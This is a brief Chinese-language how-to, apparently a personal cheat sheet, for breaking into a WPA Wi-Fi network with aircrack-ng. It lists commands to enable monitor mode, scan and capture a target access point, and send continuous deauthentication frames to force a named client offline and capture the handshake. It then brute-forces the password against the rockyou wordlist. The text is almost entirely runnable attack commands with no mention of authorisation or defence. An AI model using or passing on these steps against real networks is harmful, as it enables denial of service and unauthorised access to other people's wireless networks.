1.更改网卡为监听模式
sudo airmon-ng start wlan0
2.监听网卡
sudo airodump-ng wlan0mon
BSSID AP端的mac地址
PWR 信号强度(绝对值越小,信号越强)
Data 对应路由器的在线数据吞吐量,数值越大,数值上传量越大
CH 对应路由的频道
ESSID 对应路由器的名称
3.抓包
sudo airodump-ng --bssid 30:86:EB:E7:29:61 -c 11 -w /home/kali wlan0mon
4.给其中一台设备发送下线指令
sudo aireplay-ng -0 0 -a 30:86:EB:E7:29:61 -c FC:BE:7B:58:17:BD wlan0mon
sudo aireplay-ng -<攻击模式,这里使用持续攻击(0)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <被攻击设备的MAC地址> <interface名称>
等待第3步中出现 [WPA handshake],就可以退出了
5.关闭监听模式
sudo airmon-ng stop wlan0mon
6.开始暴力破解
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 30:86:EB:E7:29:61 /home/kali-01.cap
主要看人品,字典才是王道.